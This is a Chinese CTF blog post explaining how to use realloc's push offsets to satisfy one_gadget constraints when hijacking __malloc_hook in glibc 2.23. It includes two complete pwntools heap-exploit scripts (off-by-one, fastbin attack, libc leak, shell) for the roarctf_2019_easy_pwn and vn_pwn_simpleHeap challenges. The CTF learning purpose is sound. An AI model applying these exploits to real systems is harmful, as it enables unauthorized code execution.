



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="清風微醺" href="https://www.wdqjxtmph.top/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="清風微醺" href="https://www.wdqjxtmph.top/atom.xml" />
<link rel="alternate" type="application/json" title="清風微醺" href="https://www.wdqjxtmph.top/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="pwn技巧总结" />


<link rel="canonical" href="https://www.wdqjxtmph.top/2022/02/02/%E5%88%A9%E7%94%A8realloc%E8%B0%83%E6%95%B4%E6%A0%88%E4%BD%BFone_gadget%E7%94%9F%E6%95%88/">



  <title>
利用realloc调整栈使one_gadget生效 - CTF |
Nirvana = 清風微醺 = 凌恒</title>
<meta name="generator" content="Hexo 5.4.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">利用realloc调整栈使one_gadget生效
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2022-02-02 12:59:53">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2022-02-02T12:59:53+08:00">2022-02-02</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>6.2k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>6 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Nirvana</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1giclxfdlttj20zk0m8npd.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1giciuja1j1j20zk0m8kjl.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gicivghyooj20zk0m8dir.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gicliierfjj20zk0m8npd.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1giclil3m4ej20zk0m8tn8.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1giciuv0socj20zk0m8qes.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/CTF/" itemprop="item" rel="index" title="分类于 CTF"><span itemprop="name">CTF</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://www.wdqjxtmph.top/2022/02/02/%E5%88%A9%E7%94%A8realloc%E8%B0%83%E6%95%B4%E6%A0%88%E4%BD%BFone_gadget%E7%94%9F%E6%95%88/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="invincible">
    <meta itemprop="description" content="凌恒, 凌恒山其若陋兮、">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="清風微醺">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="前言"><a class="markdownIt-Anchor" href="#前言">#</a> 前言</h1>
<p>当堆题保护全开的时候。PIE 保护几乎使得 unlink 失效（除非能够计算出程序基址），FULL RELEO 也使得函数 GOT 表不可修改。此时常覆盖各种函数的 hook 为 one_gadget 来 getshell。</p>
<p>我常考虑的顺序是：</p>
<p><code>free_hook</code> -&gt; <code>malloc_hook</code> -&gt; <code>IO_FILE</code> -&gt; <code>exit_hook</code></p>
<p>若有沙盒限制，则考虑 <code>setcontext</code></p>
<p>当 <code>free_hook</code>  不可打时（例如 Fastbin Attack 时 free_hook 前不能构造字节错位），我们往往就会打 <code>malloc_hook</code> 。此篇文章基于将 <code>malloc_hook</code>  覆盖为 one_gadget，且 one_gadget 全失效的情况，如何用 realloc 的小 trick 调整栈，使得 one_gadget 可执行。</p>
<h1 id="one_gadget成功条件"><a class="markdownIt-Anchor" href="#one_gadget成功条件">#</a> one_gadget 成功条件</h1>
<p>以 64 位 libc-2.23.so 为例，各个 one_gadget 生效的条件如下：</p>
<p><img data-src="https://tva3.sinaimg.cn/large/008qDYGVly1gyz4a9su91j30e707nwgz.jpg" alt="1"></p>
<p>如图，0x4526a 的 one_gadget 生效条件为：[rsp+0x30]==NULL。</p>
<p>要使该 one_gadget 生效，只需让 rsp+0x30 位置处数据为 NULL 即可。</p>
<h1 id="realloc函数分析"><a class="markdownIt-Anchor" href="#realloc函数分析">#</a> realloc 函数分析</h1>
<p>realloc 函数与 malloc，free 等函数执行流程一致，</p>
<p>均为：检查其对应 hook 是否为 NULL，若不为 NULL，则调用相应 hook。</p>
<p>不同的是，realloc 函数相较于 malloc 与 free，多了很多 push 和 sub 操作，我们可以通过这个来达到调整栈的目的。</p>
<p>以 64 位 libc-2.23.so 为例，将 libc-2.23.so 拖进 IDA, 找到 realloc 函数：</p>
<p><img data-src="https://tvax2.sinaimg.cn/large/008qDYGVly1gyz4ntkmtuj30s40f3qe1.jpg" alt="2"></p>
<p>因此我们可以用 realloc_addr+offset 的方式来调整栈，offset 可取 0，2,4,6,12,13。依次减少了 push 的次数。push 指令会减小 rsp 的值，减少 push 指令个数相当于抬高栈，有利于满足 rsp+0x30==NULL。</p>
<h1 id="利用过程"><a class="markdownIt-Anchor" href="#利用过程">#</a> 利用过程</h1>
<p>将 <code>realloc_hook</code>  覆盖为 one_gadget，然后将 <code>malloc_hook</code>  覆盖为 realloc_addr+offset</p>
<p>这样劫持后的实际运行顺序：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">malloc -&gt; malloc_hook -&gt; realloc -&gt; realloc_hook -&gt; onegadget</span><br></pre></td></tr></table></figure>
<h1 id="例题"><a class="markdownIt-Anchor" href="#例题">#</a> 例题</h1>
<h2 id="roarctf_2019_easy_pwn"><a class="markdownIt-Anchor" href="#roarctf_2019_easy_pwn">#</a> roarctf_2019_easy_pwn</h2>
<h3 id="程序分析"><a class="markdownIt-Anchor" href="#程序分析">#</a> 程序分析</h3>
<ul>
<li>保护全开</li>
<li>edit 函数中：若满足输入长度等于申请堆块大小 + 10，则有一个 off by one 漏洞</li>
<li>free_hook 可打，可以构造字节错位，但是不知道为什么莫名其妙会报错。</li>
</ul>
<h3 id="pwn"><a class="markdownIt-Anchor" href="#pwn">#</a> pwn</h3>
<p>很简单的一道题，具体流程：</p>
<ul>
<li>off by one 构造 chunk extend</li>
<li>在大堆块中构建一个 fake_chunk，free 掉这个 fake_chunk（大小得能落入 unsortedbin），通过 show 大堆块，泄露 libc 基址</li>
<li>通过 Fastbin Double Free 和 Arbitrary Alloc 打 malloc_hook</li>
</ul>
<h3 id="关于offset的选择"><a class="markdownIt-Anchor" href="#关于offset的选择">#</a> 关于 offset 的选择</h3>
<p>可以调试，不过具体调试起来，并不是少一个 push，就达到 [rsp+0x20]=[rsp+0x28] 的效果，少部分的某些地址可能还是会被写入其他值，因此一个一个试比较快 /doge。</p>
<h3 id="exp"><a class="markdownIt-Anchor" href="#exp">#</a> exp</h3>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">r = process(<span class="string">&#x27;/mnt/hgfs/ubuntu/BUUCTF/roarctf_2019_easy_pwn&#x27;</span>)</span><br><span class="line">elf =  ELF(<span class="string">&#x27;/mnt/hgfs/ubuntu/BUUCTF/roarctf_2019_easy_pwn&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;/mnt/hgfs/ubuntu/BUUCTF/libc-2.23-64.so&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">new</span>(<span class="params">size</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&quot;choice: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;size: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(size))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params"><span class="built_in">id</span>,size,content</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&quot;choice: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;index: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;size: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;content: &quot;</span>)</span><br><span class="line">    r.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params"><span class="built_in">id</span></span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&quot;choice: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;index: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params"><span class="built_in">id</span></span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&quot;choice: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;4&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;index: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment">## leak_libc </span></span><br><span class="line">new(<span class="number">0x18</span>)</span><br><span class="line">new(<span class="number">0x20</span>)</span><br><span class="line">new(<span class="number">0x80</span>)</span><br><span class="line"><span class="comment"># new(0x10)</span></span><br><span class="line"><span class="comment"># new(0x10)</span></span><br><span class="line">new(<span class="number">0x10</span>)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">0</span>,<span class="number">0x18</span>+<span class="number">10</span>,<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x10</span>)+p64(<span class="number">0</span>)+<span class="string">b&#x27;\xc1&#x27;</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">new(<span class="number">0xb0</span>)</span><br><span class="line">fake_chunk = p64(<span class="number">0</span>)+p64(<span class="number">0x91</span>)+p64(<span class="number">0</span>)*<span class="number">0x10</span></span><br><span class="line">edit(<span class="number">1</span>,<span class="number">0xb0</span>,<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x20</span>+fake_chunk)</span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">r.recvuntil(<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x20</span>)</span><br><span class="line">r.recv(<span class="number">0x10</span>)</span><br><span class="line">libc.address = u64(r.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\0&#x27;</span>))-<span class="number">0x3C4B78</span></span><br><span class="line"></span><br><span class="line">free_hook = libc.symbols[<span class="string">&quot;__free_hook&quot;</span>]</span><br><span class="line"></span><br><span class="line">new(<span class="number">0x80</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#fastbin attack</span></span><br><span class="line">new(<span class="number">0x18</span>)<span class="comment">#id:4</span></span><br><span class="line">new(<span class="number">0x10</span>)<span class="comment">#id:5</span></span><br><span class="line">new(<span class="number">0x60</span>)<span class="comment">#id:6</span></span><br><span class="line">new(<span class="number">0x10</span>)<span class="comment">#id:7</span></span><br><span class="line">malloc_hook = libc.symbols[<span class="string">&quot;__malloc_hook&quot;</span>]</span><br><span class="line">realloc = libc.symbols[<span class="string">&quot;realloc&quot;</span>]</span><br><span class="line">fake_fd1 = malloc_hook - <span class="number">0x1b</span> - <span class="number">0x8</span></span><br><span class="line">fake_fd = free_hook-<span class="number">0xb</span>-<span class="number">0x8</span></span><br><span class="line">edit(<span class="number">4</span>,<span class="number">0x18</span>+<span class="number">10</span>,<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x10</span>+p64(<span class="number">0</span>)+<span class="string">b&#x27;\x91&#x27;</span>)</span><br><span class="line">delete(<span class="number">5</span>)</span><br><span class="line">new(<span class="number">0x80</span>)</span><br><span class="line">edit(<span class="number">5</span>,<span class="number">0x20</span>,<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x10</span>+p64(<span class="number">0</span>)+p64(<span class="number">0x71</span>))</span><br><span class="line">delete(<span class="number">6</span>)</span><br><span class="line">edit(<span class="number">5</span>,<span class="number">0x28</span>,<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x10</span>+p64(<span class="number">0</span>)+p64(<span class="number">0x71</span>)+p64(fake_fd1))</span><br><span class="line">new(<span class="number">0x60</span>)</span><br><span class="line"></span><br><span class="line">new(<span class="number">0x60</span>)</span><br><span class="line"></span><br><span class="line">one_gadget = libc.address + <span class="number">0xf02a4</span></span><br><span class="line">edit(<span class="number">8</span>,<span class="number">0x1b</span>,<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0xb</span>)+p64(one_gadget)+p64(realloc))</span><br><span class="line"></span><br><span class="line">log.success(<span class="string">&quot;free_hook:&quot;</span>+<span class="built_in">hex</span>(free_hook))</span><br><span class="line">log.success(<span class="string">&quot;malloc_hook:&quot;</span>+<span class="built_in">hex</span>(malloc_hook))</span><br><span class="line">log.success(<span class="string">&quot;one_gadget:&quot;</span>+<span class="built_in">hex</span>(one_gadget))</span><br><span class="line">log.success(<span class="string">&quot;libc_base: &quot;</span>+<span class="built_in">hex</span>(libc.address))</span><br><span class="line">new(<span class="number">0x10</span>)</span><br><span class="line"><span class="comment"># r.sendline(b&#x27;cat flag&#x27;)                      </span></span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="vn_pwn_simpleheap"><a class="markdownIt-Anchor" href="#vn_pwn_simpleheap">#</a> vn_pwn_simpleHeap</h2>
<p>直接放 exp 了，有兴趣的可以去做一做，有一个注意点：</p>
<p>通过 edit 修改堆块内容后，程序会在最后一个字节置’\0’截止符，这会导致 libc 基址泄露失败。</p>
<p>所以我的想法是：</p>
<p>①：off by one 构造 chunk overlapping，free 掉大堆块中的小堆块 (unsortedbin)。</p>
<p>②：free 掉大堆块，再申请回大堆块，用申请堆块时输入内容的功能代替 edit 功能，一直输入到小堆块 fd 指针前一个字节。</p>
<p>③：用 show 功能里的 % s 泄露出 libc 基址。</p>
<h3 id="exp-2"><a class="markdownIt-Anchor" href="#exp-2">#</a> exp</h3>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.terminal = [<span class="string">&#x27;gnome-terminal&#x27;</span>, <span class="string">&#x27;-x&#x27;</span>, <span class="string">&#x27;sh&#x27;</span>, <span class="string">&#x27;-c&#x27;</span>]</span><br><span class="line">r = process(<span class="string">&#x27;/mnt/hgfs/ubuntu/BUUCTF/vn_pwn_simpleHeap&#x27;</span>)</span><br><span class="line"><span class="comment"># r = remote(&#x27;node4.buuoj.cn&#x27;,28646)</span></span><br><span class="line">libc = ELF(<span class="string">&#x27;/mnt/hgfs/ubuntu/BUUCTF/libc-2.23.so&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">new</span>(<span class="params">size,content</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&quot;choice: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;size?&quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;content:&quot;</span>)</span><br><span class="line">    r.send(content)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Done!&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&quot;choice: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;idx?&quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(index))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;content:&quot;</span>)</span><br><span class="line">    r.sendline(content)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Done!&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&quot;choice: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;idx?&quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params">index</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">b&quot;choice: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;4&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;idx?&quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(index))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Done!&quot;</span>)</span><br><span class="line"></span><br><span class="line">new(<span class="number">0x28</span>,<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x28</span>)<span class="comment">#0</span></span><br><span class="line">new(<span class="number">0x28</span>,<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x28</span>)<span class="comment">#1</span></span><br><span class="line">new(<span class="number">0x28</span>,<span class="string">b&#x27;c&#x27;</span>*<span class="number">0x28</span>)<span class="comment">#2</span></span><br><span class="line">new(<span class="number">0x50</span>,<span class="string">b&#x27;d&#x27;</span>*<span class="number">0x50</span>)<span class="comment">#3</span></span><br><span class="line">new(<span class="number">0x28</span>,<span class="string">b&#x27;\0&#x27;</span>)<span class="comment">#4</span></span><br><span class="line">new(<span class="number">0x28</span>,<span class="string">b&#x27;\0&#x27;</span>)<span class="comment">#5</span></span><br><span class="line">new(<span class="number">0x28</span>,<span class="string">b&#x27;\0&#x27;</span>)<span class="comment">#6</span></span><br><span class="line">new(<span class="number">0x38</span>,<span class="string">b&#x27;\0&#x27;</span>)<span class="comment">#7</span></span><br><span class="line">new(<span class="number">0x60</span>,<span class="string">b&#x27;\0&#x27;</span>)<span class="comment">#8</span></span><br><span class="line">new(<span class="number">0x10</span>,<span class="string">b&#x27;\0&#x27;</span>)<span class="comment">#9</span></span><br><span class="line">edit(<span class="number">0</span>,<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x28</span>+<span class="string">b&#x27;\x61&#x27;</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">new(<span class="number">0x50</span>,<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x28</span>+p64(<span class="number">0x91</span>))<span class="comment">#1</span></span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">new(<span class="number">0x50</span>,<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x30</span>)<span class="comment">#1</span></span><br><span class="line">show(<span class="number">1</span>)<span class="comment">#woc</span></span><br><span class="line">r.recvuntil(<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x30</span>)</span><br><span class="line">libc_base = u64(r.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\0&#x27;</span>))-<span class="number">0x3c4b78</span></span><br><span class="line">log.success(<span class="string">&quot;libc_base:&quot;</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line">one_gadget = libc_base+<span class="number">0x4526a</span></span><br><span class="line">malloc_hook = libc_base+libc.symbols[<span class="string">&quot;__malloc_hook&quot;</span>]</span><br><span class="line">realloc_hook=libc_base+libc.symbols[<span class="string">&#x27;__libc_realloc&#x27;</span>]</span><br><span class="line">edit(<span class="number">4</span>,<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x28</span>+<span class="string">b&#x27;\x61&#x27;</span>)</span><br><span class="line">delete(<span class="number">5</span>)</span><br><span class="line">new(<span class="number">0x50</span>,<span class="string">b&#x27;\0&#x27;</span>*<span class="number">0x28</span>+p64(<span class="number">0x71</span>))</span><br><span class="line">delete(<span class="number">8</span>)</span><br><span class="line">delete(<span class="number">6</span>)</span><br><span class="line">edit(<span class="number">2</span>,<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x28</span>+p64(<span class="number">0x71</span>)+p64(malloc_hook-<span class="number">0x1b</span>-<span class="number">0x8</span>))</span><br><span class="line">new(<span class="number">0x60</span>,<span class="string">b&#x27;aaaa&#x27;</span>)</span><br><span class="line">new(<span class="number">0x60</span>,<span class="string">b&#x27;a&#x27;</span>*<span class="number">0xb</span>+p64(one_gadget)+p64(realloc_hook+<span class="number">13</span>))</span><br><span class="line">log.success(<span class="string">&quot;malloc_hook:&quot;</span>+<span class="built_in">hex</span>(malloc_hook))</span><br><span class="line">log.success(<span class="string">&quot;one_gadget:&quot;</span>+<span class="built_in">hex</span>(one_gadget))</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">b&quot;choice: &quot;</span>)</span><br><span class="line">r.sendline(<span class="string">b&quot;1&quot;</span>)</span><br><span class="line">gdb.attach(r,<span class="string">&#x27;b malloc&#x27;</span>)</span><br><span class="line">r.sendlineafter(<span class="string">b&quot;size?&quot;</span>, <span class="string">b&quot;16&quot;</span>)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

      <div class="tags">
          <a href="/tags/pwn%E6%8A%80%E5%B7%A7%E6%80%BB%E7%BB%93/" rel="tag"><i class="ic i-tag"></i> pwn技巧总结</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2022-02-02 16:03:31" itemprop="dateModified" datetime="2022-02-02T16:03:31+08:00">2022-02-02</time>
  </span>
  <span id="2022/02/02/利用realloc调整栈使one_gadget生效/" class="item leancloud_visitors" data-flag-title="利用realloc调整栈使one_gadget生效" title="阅读次数">
      <span class="icon">
        <i class="ic i-eye"></i>
      </span>
      <span class="text">阅读次数</span>
      <span class="leancloud-visitors-count"></span>
      <span class="text">次</span>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="invincible 微信支付">
        <p>微信支付</p>
      </div>
      
